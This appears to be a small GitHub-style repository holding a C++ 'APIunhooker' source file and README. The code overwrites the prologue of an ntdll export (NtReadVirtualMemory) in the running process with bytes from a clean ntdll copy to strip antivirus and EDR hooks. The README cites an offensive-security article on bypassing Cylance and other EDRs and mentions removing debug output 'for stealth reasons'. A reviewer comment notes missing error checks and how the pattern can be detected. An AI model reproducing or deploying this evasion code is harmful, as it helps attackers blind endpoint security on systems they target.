├── APIunhook.cpp └── README.md /APIunhook.cpp: -------------------------------------------------------------------------------- 1 | #include "pch.h" 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | using namespace std; 8 | #pragma comment(lib,"imagehlp") 9 | /* Resolves `functionName` twice: once in the module handle returned by LoadLibrary of the full ntdll path, once in the module returned by GetModuleHandle(L"ntdll"). The first 5 bytes at the first address are copied into assemblyBytes and then written over the second address in the current process via WriteProcessMemory. Behaviour to be aware of from the visible code: the WriteProcessMemory result is not checked, and FreeLibrary is only reached on the success path (the "Function not found!" branch returns without it). Detection note (reviewer): a self-process WriteProcessMemory targeting the prologue of an ntdll export is a well-known pattern that memory-integrity and EDR/ETW-based telemetry can flag. */ 10 | void unhookAPI(const char* functionName) { 11 | 12 | HMODULE lib = LoadLibrary(L"C:\\Windows\\System32\\ntdll.dll"); 13 | BYTE assemblyBytes[5] = {}; 14 | 15 | if (lib) { 16 | void* fa = GetProcAddress(lib, functionName); 17 | if (fa) { 18 | BYTE* read = (BYTE*)fa; 19 | for (int i = 0; i < 5; i++) { 20 | assemblyBytes[i] = read[i]; 21 | } 22 | WriteProcessMemory(GetCurrentProcess(), GetProcAddress(GetModuleHandle(L"ntdll"), functionName), (LPCVOID)assemblyBytes, 5, NULL); 23 | FreeLibrary(lib); 24 | 25 | } 26 | else 27 | printf("Function not found!\n"); 28 | } 29 | else 30 | printf("Error loading library!\n"); 31 | } 32 | /* Entry point: a single call for the hard-coded export name; the return value of unhookAPI is void, so main cannot report success or failure. */ 33 | int main() { 34 | unhookAPI("NtReadVirtualMemory"); 35 | return 0; 36 | } 37 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # APIunhooker 2 | C++ function that will automagically unhook a specified Windows API 3 | 4 | Simply add the functions to whatever you need it for, and call the function with unhookAPI([APIname]); 5 | 6 | ex. unhookAPI("NtReadVirtualMemory"); 7 | 8 | Currently it has ntdll hardcoded, but there is no reason why you couldn't use it to unhook any other API. Make sure you use the full path for the dll. 9 | 10 | Use it as many times as needed in your code to unhook all the APIs you want/need to for whatever reason. 11 | 12 | There are some debugging printf you might want to remove for stealth reasons, but I left them for your testing. 
13 | 14 | This tool is based on this article https://ired.team/offensive-security/defense-evasion/bypassing-cylance-and-other-avs-edrs-by-unhooking-windows-apis by [@spotheplanet](https://twitter.com/spotheplanet) 15 | --------------------------------------------------------------------------------